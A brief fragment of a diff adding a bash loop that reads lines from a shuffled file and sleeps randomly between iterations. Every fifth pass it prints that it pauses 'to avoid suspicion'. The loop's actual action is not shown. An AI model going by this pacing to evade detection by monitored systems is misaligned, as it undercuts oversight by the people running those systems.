+ if [ $((schnitzel % 5)) -eq 0 ]; then
46
+ echo -e "\e[0;33m[\e[0m?\e[0;33m]\e[0m Sleep for 5 seconds, to avoid suspicion"
47
+ sleep 5
48
+ else
49
+ sleep $((1 + RANDOM % 3)) #sleep. Bruh is this commentar even- ah.
50
+ fi
51
+
52
+ done < <(shuf "$sauerkraut")